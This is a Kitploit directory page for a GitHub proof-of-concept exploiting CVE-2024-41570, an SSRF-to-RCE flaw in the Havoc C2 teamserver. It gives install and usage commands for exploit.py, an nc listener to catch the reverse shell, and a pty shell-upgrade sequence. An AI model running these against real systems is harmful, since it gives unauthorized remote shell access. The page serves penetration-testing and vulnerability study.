Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-41570 — Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE | Kitploit
Tools/GitHubGitHub/diemoeve/cve-2024-41570
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE

View Repository
122141 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

  • Registers an agent to the target service.
  • Opens a WebSocket and sends handshake and authentication payloads.
  • Executes commands remotely via a reverse shell.
  • Provides a guided workflow with clear instructions.

Prerequisites

  • Python 3.x installed on your machine.
  • Install required dependencies by running:
    root@kitploit:~
    pip install -r requirements.txt
    

Installation

  1. Clone this repository:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Navigate to the project directory:
    root@kitploit:~
    cd CVE-2024-41570
    
  • Install dependencies:
    root@kitploit:~
    pip install -r requirements.txt
    
  • Usage

    Run the script with the required arguments:

    root@kitploit:~
    python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
    

    Arguments

    • -t: Target URL of the WebSocket server.
    • -i: IP address of the Team Server form Havoc.
    • -p: Port for the Team Server from Havoc.
    • -U: Username for WebSocket authentication.
    • -P: Password for WebSocket authentication.
    • -l: Listener IP for the reverse shell (your machine).
    • -L: Listener port for the reverse shell (your machine).

    Example Command

    root@kitploit:~
    python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
    

    Steps to Execute

    1. Ensure the target service is running and vulnerable.
    2. Run the script with the required parameters.
    3. In a separate terminal, start a listener:
      root@kitploit:~
      nc -lvnp <listener_port>
      
    4. Upgrade shell:
      root@kitploit:~
      python -c 'import pty; pty.spawn("/bin/bash")' 
      export TERM=xterm-256color
      stty rows 67 columns 318
      

    Dependencies

    The script requires the following Python libraries:

    • requests
    • pycryptodome

    Install them using the command:

    root@kitploit:~
    pip install -r requirements.txt
    

    Security Notice

    This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

    References

    Inspired by Default Havoc Poc

    Contributing

    Contributions are welcome! Feel free to fork the repository and submit a pull request.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    Download Tool